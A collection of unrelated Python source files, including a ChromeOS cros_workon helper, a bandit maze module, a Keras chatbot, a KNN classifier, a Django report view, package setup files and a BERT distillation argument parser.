list of canonical portage atoms corresponding to the given fragments.
"""
if not packages:
raise WorkonError('No packages specified')
if len(packages) == 1 and packages[0] == '.':
raise WorkonError('Working on the current package is no longer '
'supported.')
atoms = []
for package_fragment in packages:
atom = self._GetCanonicalAtom(package_fragment, find_stale=find_stale)
if atom is None:
raise WorkonError('Error parsing package list')
atoms.append(atom)
return atoms
def _GetWorkedOnAtoms(self):
"""Returns a list of CP atoms that we're currently working on."""
return _GetLinesFromFile(self.workon_file_path, '=', '-9999')
def _FindEbuildForPackage(self, package):
"""Find an ebuild for a given atom (accepting even masked ebuilds).
Args:
package: package string.
Returns:
path to ebuild for given package.
"""
return portage_util.FindEbuildForPackage(
package, self._sysroot, include_masked=True,
extra_env={'ACCEPT_KEYWORDS': '~%s' % self._arch})
def _GetWorkonEbuilds(self, filter_workon=False, filter_on_arch=True,
include_chrome=True):
"""Get a list of all cros-workon ebuilds in the current system.
Args:
filter_workon: True iff we should filter the list of ebuilds to those
packages which define only a workon ebuild (i.e. no stable version).
filter_on_arch: True iff we should only return ebuilds which are marked
as unstable for the architecture of the system we're interested in.
include_chrome: True iff we should also include chromeos-chrome and
related ebuilds. These ebuilds can be worked on, but don't work
like normal cros-workon ebuilds.
Returns:
list of paths to ebuilds meeting the above criteria.
"""
result = []
if filter_on_arch:
keyword_pat = re.compile(r'^KEYWORDS=".*~(\*|%s).*"$' % self._arch, re.M)
for overlay in self._overlays:
ebuild_paths = glob.glob(
os.path.join(overlay, '*-*', '*', '*-9999.ebuild'))
for ebuild_path in ebuild_paths:
ebuild_contents = osutils.ReadFile(ebuild_path)
if not _IsWorkonEbuild(include_chrome, ebuild_path,
ebuild_contents=ebuild_contents):
continue
if filter_on_arch and not keyword_pat.search(ebuild_contents):
continue
result.append(ebuild_path)
if filter_workon:
result = _FilterWorkonOnlyEbuilds(result)
return result
def _GetLiveAtoms(self, filter_workon=False):
"""Get a list of atoms currently marked as being locally compiled.
Args:
filter_workon: True iff the list should be filtered to only those
atoms without a stable version (i.e. the -9999 ebuild is the
only ebuild).
Returns:
list of canonical portage atoms.
"""
atoms = self._GetWorkedOnAtoms()
if filter_workon:
ebuilds = _FilterWorkonOnlyEbuilds(self._AtomsToEbuilds(atoms))
return [portage_util.EbuildToCP(ebuild) for ebuild in ebuilds]
return atoms
def _AddProjectsToPartialManifests(self, atoms):
"""Add projects corresponding to a list of atoms to the local manifest.
If we mark projects as workon that we don't have in our local checkout,
it is convenient to have them added to the manifest. Note that users
will need to `repo sync` to pull down repositories added in this way.
Args:
atoms: iterable of atoms to ensure are in the manifest.
"""
if git.ManifestCheckout.IsFullManifest(self._src_root):
# If we're a full manifest, there is nothing to do.
return
should_repo_sync = False
for ebuild_path in self._AtomsToEbuilds(atoms):
infos = portage_util.GetRepositoryForEbuild(ebuild_path, self._sysroot)
for info in infos:
if not info.project:
continue
cmd = ['loman', 'add', '--workon', info.project]
cros_build_lib.run(cmd, print_cmd=False)
should_repo_sync = True
if should_repo_sync:
print('Please run "repo sync" now.')
def ListAtoms(self, use_all=False, use_workon_only=False):
"""Returns a list of interesting atoms.
By default, return a list of the atoms marked as being locally worked on
for the system in question.
Args:
use_all: If true, return a list of all atoms we could possibly work on
for the system in question.
use_workon_only: If true, return a list of all atoms we could possibly
work on that have no stable ebuild.
Returns:
a list of atoms (e.g. ['chromeos-base/shill', 'sys-apps/dbus']).
"""
if use_workon_only or use_all:
ebuilds = self._GetWorkonEbuilds(filter_workon=use_workon_only)
packages = [portage_util.EbuildToCP(ebuild) for ebuild in ebuilds]
else:
packages = self._GetLiveAtoms()
return sorted(packages)
def StartWorkingOnPackages(self, packages, use_all=False,
use_workon_only=False):
"""Mark a list of packages as being worked on locally.
Args:
packages: list of package name fragments. While each fragment could be a
complete portage atom, this helper will attempt to infer intent by
looking for fragments in a list of all possible atoms for the system
in question.
use_all: True iff we should ignore the package list, and instead consider
all possible atoms that we could mark as worked on locally.
use_workon_only: True iff we should ignore the package list, and instead
consider all possible atoms for the system in question that define
only the -9999 ebuild.
"""
if not os.path.exists(self._sysroot):
raise WorkonError('Sysroot %s is not setup.' % self._sysroot)
if use_all or use_workon_only:
ebuilds = self._GetWorkonEbuilds(filter_workon=use_workon_only)
atoms = [portage_util.EbuildToCP(ebuild) for ebuild in ebuilds]
else:
atoms = self._GetCanonicalAtoms(packages)
atoms = set(atoms)
# Read out what atoms we're already working on.
existing_atoms = self._GetWorkedOnAtoms()
# Warn the user if they're requested to work on an atom that's already
# marked as being worked on.
for atom in atoms & existing_atoms:
logging.warning('Already working on %s', atom)
# If we have no new atoms to work on, we can quit now.
new_atoms = atoms - existing_atoms
if not new_atoms:
return
# Write out all these atoms to the appropriate files.
current_atoms = new_atoms | existing_atoms
self._SetWorkedOnAtoms(current_atoms)
self._AddProjectsToPartialManifests(new_atoms)
# Legacy scripts used single quotes in their output, and we carry on this
# honorable tradition.
logging.info("Started working on '%s' for '%s'",
' '.join(new_atoms), self._system)
def StopWorkingOnPackages(self, packages, use_all=False,
use_workon_only=False):
"""Stop working on a list of packages currently marked as locally worked on.
Args:
packages: list of package name fragments. These will be mapped to
canonical portage atoms via the same process as
StartWorkingOnPackages().
use_all: True iff instead of the provided package list, we should just
stop working on all currently worked on atoms for the system in
question.
use_workon_only: True iff instead of the provided package list, we should
stop working on all currently worked on atoms that define only a
-9999 ebuild.
"""
if use_all or use_workon_only:
atoms = self._GetLiveAtoms(filter_workon=use_workon_only)
else:
atoms = self._GetCanonicalAtoms(packages, find_stale=True)
current_atoms = self._GetWorkedOnAtoms()
stopped_atoms = []
for atom in atoms:
if not atom in current_atoms:
logging.warning('Not working on %s', atom)
continue
current_atoms.discard(atom)
stopped_atoms.append(atom)
self._SetWorkedOnAtoms(current_atoms)
if stopped_atoms:
# Legacy scripts used single quotes in their output, and we carry on this
# honorable tradition.
logging.info("Stopped working on '%s' for '%s'",
' '.join(stopped_atoms), self._system)
def GetPackageInfo(self, packages, use_all=False, use_workon_only=False):
"""Get information about packages.
Args:
packages: list of package name fragments. These will be mapped to
canonical portage atoms via the same process as
StartWorkingOnPackages().
use_all: True iff instead of the provided package list, we should just
stop working on all currently worked on atoms for the system in
question.
use_workon_only: True iff instead of the provided package list, we should
stop working on all currently worked on atoms that define only a
-9999 ebuild.
Returns:
Returns a list of PackageInfo tuples.
"""
if use_all or use_workon_only:
# You can't use info to find the source code from Chrome, since that
# workflow is different.
ebuilds = self._GetWorkonEbuilds(filter_workon=use_workon_only,
include_chrome=False)
else:
atoms = self._GetCanonicalAtoms(packages)
ebuilds = [self._FindEbuildForPackage(atom) for atom in atoms]
build_root = self._src_root
src_root = os.path.join(build_root, 'src')
manifest = git.ManifestCheckout.Cached(build_root)
ebuild_to_repos = {}
ebuild_to_src_paths = collections.defaultdict(list)
for ebuild in ebuilds:
workon_vars = portage_util.EBuild.GetCrosWorkonVars(
ebuild, portage_util.EbuildToCP(ebuild))
projects = workon_vars.project if workon_vars else []
ebuild_to_repos[ebuild] = projects
ebuild_obj = portage_util.EBuild(ebuild)
if ebuild_obj.is_blacklisted:
# blacklisted ebuilds may have source infos incorrectly defined since
# they are not validated by bots
continue
src_paths = ebuild_obj.GetSourceInfo(src_root, manifest).srcdirs
src_paths = [os.path.relpath(path, build_root) for path in src_paths]
ebuild_to_src_paths[ebuild] = src_paths
result = []
for ebuild in ebuilds:
package = portage_util.EbuildToCP(ebuild)
repos = ebuild_to_repos.get(ebuild, [])
src_paths = ebuild_to_src_paths.get(ebuild, [])
result.append(PackageInfo(package, repos, src_paths))
result.sort()
return result
def RunCommandInAtomSourceDirectory(self, atom, command):
"""Run a command in the source directory of an atom.
Args:
atom: string atom to run the command in (e.g. 'chromeos-base/shill').
command: string shell command to run in the source directory of |atom|.
"""
logging.info('Running "%s" on %s', command, atom)
ebuild_path = self._FindEbuildForPackage(atom)
if ebuild_path is None:
raise WorkonError('Error looking for atom %s' % atom)
for info in portage_util.GetRepositoryForEbuild(ebuild_path, self._sysroot):
cros_build_lib.run(command, shell=True, cwd=info.srcdir, print_cmd=False)
def RunCommandInPackages(self, packages, command, use_all=False,
use_workon_only=False):
"""Run a command in the source directory of a list of packages.
Args:
packages: list of package name fragments.
command: string shell command to run in the source directory of |atom|.
use_all: True iff we should ignore the package list, and instead consider
all possible workon-able atoms.
use_workon_only: True iff we should ignore the package list, and instead
consider all possible atoms for the system in question that define
only the -9999 ebuild.
"""
if use_all or use_workon_only:
atoms = self._GetLiveAtoms(filter_workon=use_workon_only)
else:
atoms = self._GetCanonicalAtoms(packages)
for atom in atoms:
self.RunCommandInAtomSourceDirectory(atom, command)
def InstalledWorkonAtoms(self):
"""Returns the set of installed cros_workon packages."""
installed_cp = set()
for pkg in portage_util.PortageDB(self._sysroot).InstalledPackages():
installed_cp.add('%s/%s' % (pkg.category, pkg.package))
return set(a for a in self.ListAtoms(use_all=True) if a in installed_cp)
|
the-stack_106_16932
|
import numpy as np
from math import sqrt, log
from Bandit import Bandit
#from maze import Sets
'''
def get_nearby_set_to_ban(set_index_list, bandit_index, ban_to_set_dict):
sets = ban_to_set_dict[str(bandit_index)]
min_index = set_index_list[0]
min = abs(sets[0]-min_index)
for i in set_index_list:
for j in sets:
if abs(j-i) < min:
min_index = i
min = abs(j-i)
return min_index
'''
def euclidian_dist(c1, c2):
return (c1[0]-c2[0])**2 + (c1[1]-c2[1])**2
#for maze formation
def get_nearby_set_to_ban(set_index_list, bandit_index, ban_to_set_dict):
sets = ban_to_set_dict[str(bandit_index)]
current_coordinates = [(i//10, i%10) for i in set_index_list]
ban_coordinates = [(i//10, i%10) for i in sets]
min_index = set_index_list[0]
min = euclidian_dist(ban_coordinates[0], current_coordinates[0])
for i in range(len(current_coordinates)):
for j in range(len(ban_coordinates)):
dist = euclidian_dist(current_coordinates[i], ban_coordinates[j])
if dist < min:
min_index = set_index_list[i]
min = dist
return min_index
#for maze formation in a single choice setting
def get_nearby_set_to_ban_1(set_index_list, bandit_index, ban_to_set_dict):
sets = ban_to_set_dict[str(bandit_index)]
current_coordinates = [(i//10, i%10) for i in set_index_list]
#ban_coordinates = [(i//10, i%10) for i in sets]
ban_coordinate = (bandit_index//10, bandit_index%10)
min_index = set_index_list[0]
min = euclidian_dist(ban_coordinate, current_coordinates[0])
for i in range(len(current_coordinates)):
for j in range(len(ban_coordinate)):
dist = euclidian_dist(current_coordinates[i], ban_coordinate) #since we r doing it for only one bandit
if dist < min:
min_index = set_index_list[i]
min = dist
return min_index
class Set():
def __init__(self, index, bandit_list, adj_set):
self.index = index
self.bandit_list = {}
for ban in bandit_list:
self.bandit_list[str(ban.index)] = ban
self.bandit_list_index = set([ban.index for ban in bandit_list])
self.adj_sets = adj_set
def is_ban_in(self, bandit_index):
if bandit_index in self.bandit_list_index:
return True
else:
return False
def get_bandit(self, bandit_index):
try:
return self.bandit_list[str(bandit_index)]
except KeyError:
return "Bandit not in the Set"
def get_ban_set(self,bandit_index, Global_Set, ban_to_set_dict):
set_in = get_nearby_set_to_ban_1(set_index_list=self.adj_sets, bandit_index=bandit_index, ban_to_set_dict=ban_to_set_dict)
return Global_Set[set_in]
'''
mean = np.load("Mean.npy")
variance = np.load("Variance.npy")
no_bandits = 100
Bandits = [Bandit(i, mean=mean[i], std=variance[i]) for i in range(no_bandits)]
Sets = []
for i in range(1,9):
for j in range(1, 9):
Sets.append(Set(index=i*10+j,bandit_list=[
Bandits[(i-1)*10 + j],
Bandits[(i-1)*10 + j-1],
Bandits[(i-1)*10 + j+1],
Bandits[(i+1)*10 + j],
Bandits[(i+1)*10 + j-1],
Bandits[(i+1)*10 + j+1],
Bandits[i*10+j],
Bandits[i*10 + j-1],
Bandits[i*10 + j+1]
],adj_set=[
(i-1)*10 + j,
(i-1)*10 + j-1,
(i-1)*10 + j+1,
(i+1)*10 + j,
(i+1)*10 + j-1,
(i+1)*10 + j+1,
i*10 + j-1,
i*10 + j+1
]))
for i in range(1, 9):
Sets.append(Set(index=i,bandit_list=[
Bandits[(i+1)*10 + 1],
Bandits[(i+1)*10 - 1],
Bandits[(i+1)*10],
Bandits[i],
Bandits[i-1],
Bandits[i+1]
],adj_set=[
(i+1)*10,
(i+1)*10-1,
(i+1)*10+1,
i-1,
i+1
]))
j = i*10
k = i
Sets.append(Set(index=j,bandit_list=[
Bandits[(k+1)*10 + 1],
Bandits[(k+1)*10],
Bandits[j+1],
Bandits[j],
Bandits[(k-1)*10 +1],
Bandits[(k-1)*10]
],adj_set=[
(k+1)*10,
(k+1)*10+1,
(k-1)*10+1,
(k-1)*10,
j+1
]))
j = i*10+9
k = i
Sets.append(Set(index=j,bandit_list=[
Bandits[(k+1)*10 + 8],
Bandits[(k+1)*10 + 9],
Bandits[j-1],
Bandits[j],
Bandits[(k-1)*10 + 8],
Bandits[(k-1)*10 + 9]
],adj_set=[
(k+1)*10 + 9,
(k+1)*10 + 8,
(k-1)*10 + 9,
(k-1)*10 + 8,
j-1
]))
for i in range(91, 99):
j = i%10
Sets.append(Set(index=i,bandit_list=[
Bandits[80 + j + 1],
Bandits[80 + j - 1],
Bandits[80 + j],
Bandits[i-1],
Bandits[i+1],
Bandits[i]
],adj_set=[
80 + j + 1,
80 + j - 1,
80 + j,
i-1,
i+1
]))
Sets.append(Set(index=0,bandit_list=[Bandits[1],Bandits[10],Bandits[11],Bandits[0],],adj_set=[10,11,1]))
Sets.append(Set(index=9,bandit_list=[Bandits[8],Bandits[19],Bandits[18],Bandits[9],],adj_set=[18,19,8]))
Sets.append(Set(index=90,bandit_list=[Bandits[90],Bandits[91],Bandits[80],Bandits[81],],adj_set=[81,80,91]))
Sets.append(Set(index=99,bandit_list=[Bandits[98],Bandits[99],Bandits[88],Bandits[89],],adj_set=[98,89,88]))
S = []
for i in range(100):
for j in Sets:
if j.index == i:
S.append(j)
Ban_to_Set_dict = {}
for i in range(100):
Ban_to_Set_dict[str(i)] = []
for i in range(len(Sets)):
for j in S[i].bandit_list:
Ban_to_Set_dict[str(j)].append(i)
print(Ban_to_Set_dict)
s = S[0]
for i in range(10):
print(s.index)
if s.is_ban_in(90) == False:
s = s.get_ban_set(90,S, Ban_to_Set_dict)
else:
pass
'''
|
the-stack_106_16934
|
import json
import pickle
import numpy as np
from tensorflow import keras
from tensorflow.keras.models import load_model
from config import *
model = load_model("saved/model.h5")
with open('saved/tokenizer.pickle', 'rb') as handle:
tokenizer = pickle.load(handle)
with open('saved/lbl_encoder.pickle', 'rb') as handle:
lbl_encoder = pickle.load(handle)
with open('saved/data.pickle', 'rb') as handle:
data = pickle.load(handle)
def chat():
print("Start messaging with the bot (type quit to stop)!\n")
while True:
print("User: ")
inp = input()
if inp.lower() == "quit":
break
result = model.predict(keras.preprocessing.sequence.pad_sequences(tokenizer.texts_to_sequences([inp]),
truncating='post', maxlen=max_len))
tag = lbl_encoder.inverse_transform([np.argmax(result)])
for i in data['intents']:
if i['tag'] == tag:
print("ChatBot:" + np.random.choice(i['responses']))
print("intent asked for: ", i['context_set'], "\n")
# print(Fore.GREEN + "ChatBot:" + Style.RESET_ALL,random.choice(responses))
chat()
|
the-stack_106_16935
|
#!/usr/bin/python3
import random
import sys
g = int()
h = int()
def gh_gt_0(g, h):
try:
if (g / h) > 0:
return '(A) g: {g} h: {h}, g/h > 0'.format(g=g, h=h)
else:
return False
except:
return print('''Can't divide by {} or {}'''.format(g, h))
def hg_dev_gt_0(h, g):
try:
if (h / g) > 0:
return '(B) h: {h} g: {g}, h/g > 0'.format(g=g, h=h)
else:
return False
except:
return print('''Can't divide by {} or {}'''.format(h, g))
def gh_plus_gt_0(g, h):
if (g + h) > 0:
return '(C) g: {g} h: {h}, g+h > 0'.format(g=g, h=h)
else:
return False
def gh_minus_gt_0(g, h):
if (g - h) > 0:
return '(D) g: {g} h: {h}, g-h > 0'.format(g=g, h=h)
else:
return False
def gh_plus_lt_0(g, h):
if (g + h) < 0:
return '(E) g: {g} h: {h}, g+h < 0'.format(g=g, h=h)
else:
return False
def try_everything(g, h):
if g * h > 0:
answers = []
answer = gh_gt_0(g, h)
if answer:
answers.append(answer)
answer = hg_dev_gt_0(h, g)
if answer:
answers.append(answer)
answer = gh_plus_gt_0(g, h)
if answer:
answers.append(answer)
answer = gh_minus_gt_0(g, h)
if answer:
answers.append(answer)
answer = gh_plus_lt_0(g, h)
if answer:
answers.append(answer)
if len(answers) == 4:
print('\n'.join(answers))
print()
if __name__ == '__main__':
results = 1000000
g_range = range(-10, 10)
h_range = range(-10, 10)
for i in range(0, results):
g = random.choice(g_range)
h = random.choice(h_range)
try_everything(g, h)
if i % 1000 == 0 and i is not 0:
print('.', end='')
sys.stdout.flush()
print('Just tried {} numbers'.format(results))
|
the-stack_106_16936
|
'''
Created on Jul 5, 2013
@author: Yubin Bai
All rights reserved.
'''
import time
from multiprocessing.pool import Pool
from heapq import *
parallelSolve = False
INF = 1 << 31
def solve(par):
graph = {1: [2, 3, 5], 2: [1, 3, 5], 3:
[1, 2, 4, 5], 4: [3, 5], 5: [1, 2, 3, 4]}
edges = set()
for v in graph:
for v2 in graph[v]:
if v < v2:
edges.add((v, v2))
path = [1]
pathEdges = []
results = []
print(edges)
def backtrack(step):
if step == len(edges):
results.append(''.join(str(e) for e in path))
v1 = path[-1]
for v2 in graph[v1]:
if v1 < v2 and (v1, v2) not in pathEdges:
path.append(v2)
pathEdges.append((v1, v2))
backtrack(step + 1)
path.pop()
pathEdges.pop()
if v1 > v2 and (v2, v1) not in pathEdges:
path.append(v2)
pathEdges.append((v2, v1))
backtrack(step + 1)
path.pop()
pathEdges.pop()
backtrack(0)
results.sort()
return '\n'.join(results)
class Solver:
def getInput(self):
self.numOfTests = 1
self.input = []
self.input.append([])
def __init__(self):
self.fIn = open('input.txt')
self.fOut = open('output.txt', 'w')
self.results = []
def parallel(self):
self.getInput()
p = Pool(4)
millis1 = int(round(time.time() * 1000))
self.results = p.map(solve, self.input)
millis2 = int(round(time.time() * 1000))
print("Time in milliseconds: %d " % (millis2 - millis1))
self.makeOutput()
def sequential(self):
self.getInput()
millis1 = int(round(time.time() * 1000))
for i in self.input:
self.results.append(solve(i))
millis2 = int(round(time.time() * 1000))
print("Time in milliseconds: %d " % (millis2 - millis1))
self.makeOutput()
def makeOutput(self):
for test in range(self.numOfTests):
self.fOut.write("%s\n" % self.results[test])
self.fIn.close()
self.fOut.close()
if __name__ == '__main__':
solver = Solver()
if parallelSolve:
solver.parallel()
else:
solver.sequential()
|
the-stack_106_16937
|
from django.shortcuts import render, redirect
from django.views import View
from datetime import datetime
from task_manager.models import Project
from .models import ProjectInfo, UserInfo, UserInProject
class Report(View):
def get(self, request):
if not request.user.is_authenticated:
return redirect('signIn')
user = request.user
projects = Project.objects.all()
p_info_list = []
u_info = UserInfo(user)
user_in_projects = []
for p in projects:
if p.owner == user or user.id in p.get_members():
p_info = ProjectInfo(p)
u_info.analyze_project(p)
p_info_list.append(p_info)
user_in_projects.append(UserInProject(user, p))
data = {"user": user,
"first": user.username[0],
"p_info": p_info_list,
"u_info": u_info,
"u_in_p": user_in_projects,
'time': datetime.today()
}
return render(request, 'report.html', data)
|
the-stack_106_16938
|
from codecs import open
from os import path
from setuptools import setup
HERE = path.abspath(path.dirname(__file__))
# Get version info
ABOUT = {}
with open(path.join(HERE, "datadog_checks", "marathon", "__about__.py")) as f:
exec(f.read(), ABOUT)
# Get the long description from the README file
with open(path.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
def get_dependencies():
dep_file = path.join(HERE, 'requirements.in')
if not path.isfile(dep_file):
return []
with open(dep_file, encoding='utf-8') as f:
return f.readlines()
CHECKS_BASE_REQ = 'datadog-checks-base>=22.0.0'
setup(
name='datadog-marathon',
version=ABOUT["__version__"],
description='The Marathon check',
long_description=long_description,
long_description_content_type='text/markdown',
keywords='datadog agent marathon check',
# The project's main homepage.
url='https://github.com/DataDog/integrations-core',
# Author details
author='Datadog',
author_email='[email protected]',
# License
license='BSD',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Topic :: System :: Monitoring',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
],
packages=['datadog_checks.marathon'],
install_requires=[CHECKS_BASE_REQ],
extras_require={'deps': get_dependencies()},
# Extra files to ship with the wheel package
include_package_data=True,
)
|
the-stack_106_16941
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
version_info = (7, 4, 2, 'final', 0)
_specifier_ = {'alpha': 'a', 'beta': 'b', 'candidate': 'rc', 'final': ''}
__version__ = '%s.%s.%s%s'%(version_info[0], version_info[1], version_info[2],
'' if version_info[3]=='final' else _specifier_[version_info[3]]+str(version_info[4]))
__protocol_version__ = '2.0.0'
__jupyter_widgets_base_version__ = '1.1.0'
__jupyter_widgets_output_version__ = '1.0.0'
__jupyter_widgets_controls_version__ = '1.4.0'
# A compatible @jupyter-widgets/html-manager npm package semver range
__html_manager_version__ = '^0.14.0'
|
the-stack_106_16942
|
import numpy as np
def distance(a: int, b: int) -> float:
"""[Calculate l2 norm which is Euclidean distance
between a and b]
Args:
a (int): [1st point]
b (int): [2nd point]
Returns:
float: [Distance between a and b]
"""
return np.linalg.norm(a-b)
class KNearestNeighbors(object):
def __init__(self, k: int = 5):
"""[Initialize KNN class with k]
Args:
k (int, optional): [number of nearest neighbors]. Defaults to 5.
"""
self.X, self.Y = None, None
self.classes = None
self.k = k
def fit(self, X: np.array, Y: np.array) -> None:
"""[Load data into RAM]
Args:
X (np.array): [X_train data]
Y (np.array): [Y_train features]
"""
self.X, self.Y = X, Y
def predict(self, new_X: np.array) -> np.array:
"""[Predict the class label of given points]
Args:
new_X (np.array): [X_test data]
Returns:
np.array: [Y_test features]
"""
Y_pred = np.zeros(len(new_X))
for i, new in enumerate(new_X):
dist_neighbors = []
for x, y in zip(self.X, self.Y):
eucl_d = distance(new, x)
dist_neighbors.append([eucl_d, y])
# sort ascending based on distances
dist_neighbors = sorted(dist_neighbors,
key=lambda x: x[0])[:self.k]
# extract 1st column from each row
col1 = lambda x: [x[i][1] for i, _ in enumerate(x)]
# find the most common label
Y_pred[i] = np.bincount(col1(dist_neighbors)).argmax()
return Y_pred
def score(self, y_test: np.array, y_pred: np.array) -> float:
"""[Calculate accuracy score]
Args:
y_test (np.array): [correct labels]
y_pred (np.array): [predicted labels]
Returns:
float: [accuarcy store, 1=100%, 0=0%]
"""
return float(np.sum(y_pred == y_test))/len(y_test)
# Check if it works
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
df = load_iris(as_frame=True).frame.values
X, y = df[:, :-1], df[:, -1]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.8,
random_state=420)
model = KNearestNeighbors(k=7)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print(model.score(y_test, y_pred))
|
the-stack_106_16947
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import cProfile
import decimal
import os
import tempfile
from wolframclient.cli.utils import SimpleCommand
from wolframclient.language import wl
from wolframclient.serializers import export
from wolframclient.utils.debug import timed
from wolframclient.utils.encoding import force_text
from wolframclient.utils.functional import first
def repeat(el, n=1):
return tuple(el for _ in range(n))
class Command(SimpleCommand):
col_size = 8
repetitions = 10
complexity = [1, 2, 5, 10, 100, 1000]
def add_arguments(self, parser):
parser.add_argument("--profile", dest="profile", default=False, action="store_true")
def complexity_handler(self, complexity):
return {
"symbols": repeat(wl.Symbol, complexity),
"strings": repeat("string", complexity),
"bytes": repeat(b"bytes", complexity),
"integers": repeat(1, complexity),
"decimals": repeat(decimal.Decimal("1.23"), complexity),
"floats": repeat(1.23, complexity),
"dict": repeat({1: 2, 3: 4, 5: 6}, complexity),
"list": repeat([1, 2, 3], complexity),
"functions": repeat(wl.Function(1, 2, 3), complexity),
}
@timed
def export(self, *args, **opts):
return export(*args, **opts)
def formatted_time(self, *args, **opts):
time = sum(first(self.export(*args, **opts)) for i in range(self.repetitions))
return "%.5f" % (time / self.repetitions)
def table_line(self, *iterable):
self.print(*(force_text(c).ljust(self.col_size) for c in iterable))
def table_divider(self, length):
self.print(*("-" * self.col_size for i in range(length)))
def report(self):
path = tempfile.gettempdir()
benchmarks = [(c, self.complexity_handler(c)) for c in self.complexity]
self.print("dumping results in", path)
# running export to do all lazy loadings
export(1)
for title, stream_generator in (
("Memory", lambda complexity: None),
(
"File",
lambda complexity: os.path.join(
path,
"benchmark-test-%s.%s" % (force_text(complexity).zfill(7), export_format),
),
),
):
self.table_line(
title, *(force_text(c).ljust(self.col_size) for c in self.complexity)
)
self.table_divider(len(self.complexity) + 1)
for label, export_format, opts in (
("wl", "wl", dict()),
("wxf", "wxf", dict()),
("wxf zip", "wxf", dict(compress=True)),
):
self.table_line(
label,
*(
self.formatted_time(
expr,
stream=stream_generator(complexity),
target_format=export_format,
**opts
)
for complexity, expr in benchmarks
)
)
self.table_line()
self.table_line()
def handle(self, profile, **opts):
if profile:
cProfile.runctx("report()", {"report": self.report}, {})
else:
self.report()
|
the-stack_106_16948
|
import argparse
import logging
import os
import random
import torch
from envs import HOME_DATA_FOLDER, HOME_OUTPUT_FOLDER
logger = logging.getLogger(__name__)
def boolean_string(s):
if s not in {'False', 'True'}:
raise ValueError('Not a valid boolean string')
return s == 'True'
def is_folder_empty(folder_name):
if len([f for f in os.listdir(folder_name) if not f.startswith('.')]) == 0:
return True
else:
return False
def default_parser():
parser = argparse.ArgumentParser()
# Input Training tasks
parser.add_argument("--task_name",
default=None,
type=str,
help="The name of the task for training.")
# System related parameters
# parser.add_argument("--output_dir",
# default=os.path.join(HOME_DATA_FOLDER, 'outputs'),
# type=str,
# help="The output directory where the model checkpoints will be written.")
parser.add_argument("--output_dir",
default = None,
type = str,
help="The output directory where the model checkpoints will be written.")
parser.add_argument("--log_every_step",
default=1,
type=int,
help="output to log every global x training steps, default is 1")
parser.add_argument("--max_seq_length",
default=512,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
# Training related parameters
parser.add_argument('--task',
type=str,
default='MRPC',
help="The task you want to finetune the model on.")
parser.add_argument('--train_type',
type=str,
default=None,
help="train type: one of ft, kd, pkd")
parser.add_argument('--model_type',
type=str,
default='Original',
help="Model type: one of Original or SPS")
parser.add_argument('--train_seed',
type=int,
default=None,
help="random seed for training")
parser.add_argument('--saving_criterion_acc',
type=float,
default=1.0,
help="If the model's val accuracy is above this value, we save the model.")
parser.add_argument('--saving_criterion_loss',
type=float,
default=0.0,
help="If the model's val loss is lower than this value, we save the model.")
parser.add_argument('--load_model_dir',
type =str,
default = None,
help="Load model")
parser.add_argument('--save_model_dir',
type = str,
default = None,
help="Specify the directory where to save the final model")
parser.add_argument('--seed',
type=int,
default=None,
help="random seed for initialization")
parser.add_argument("--train_batch_size",
default=None,
type=int,
help="Total batch size for training.")
parser.add_argument("--eval_batch_size",
default=None,
type=int,
help="Total batch size for eval.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=4.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16',
type=boolean_string,
default=False,
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--loss_scale',
type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
parser.add_argument('--student_hidden_layers',
type=int,
default=None,
help="number of transformer layers for student, default is None (use all layers)")
parser.add_argument('--teacher_prediction',
type=str,
default=None,
help="teacher prediction file to guild the student's output")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
# Distillation related parameters
parser.add_argument("--bert_model",
default=None,
type=str,
help="student bert model configuration folder")
parser.add_argument("--encoder_checkpoint",
default=None,
type=str,
help="check point for student encoder")
parser.add_argument("--cls_checkpoint",
default=None,
type=str,
help="check point for student classifier")
parser.add_argument("--output_all_encoded_layers",
default=False,
type=bool,
help="if output all encoded layers")
parser.add_argument("--alpha",
default=0.95,
type=float,
help="alpha for distillation")
parser.add_argument("--T",
default=10.,
type=float,
help="temperature for distillation")
parser.add_argument("--beta",
default=0.0,
type=float,
help="weight for AT loss")
parser.add_argument("--kd_model",
default="kd",
type=str,
help="KD model architecture, either kd, kd.full or kd.cls")
parser.add_argument("--fc_layer_idx",
default=None,
type=str,
help="layers ids we will put FC layers on, only avaiable when kd_model is kd.full")
parser.add_argument("--weights",
default=None,
type=str,
help="weight of each layer that we will put FC layers on, only available when kd_model is kd.full")
parser.add_argument("--normalize_patience",
default=False,
type=boolean_string,
help="normalize patience or not")
# Distillation related parameters
parser.add_argument("--do_train",
default=False,
type=boolean_string,
help="do training or not")
parser.add_argument("--do_eval",
default=False,
type=boolean_string,
help="do evaluation during training or not")
return parser
def complete_argument(args, out_dir, load_dir = None):
MODEL_FOLDER = os.path.join(HOME_DATA_FOLDER, 'models')
if args.student_hidden_layers in [None, 'None']:
args.student_hidden_layers = 12 if 'base' in args.bert_model else 24
args.bert_model = os.path.join(MODEL_FOLDER, 'pretrained', args.bert_model)
# if args.encoder_checkpoint not in [None, 'None']:
# args.encoder_checkpoint = os.path.join(MODEL_FOLDER, args.encoder_checkpoint)
# else:
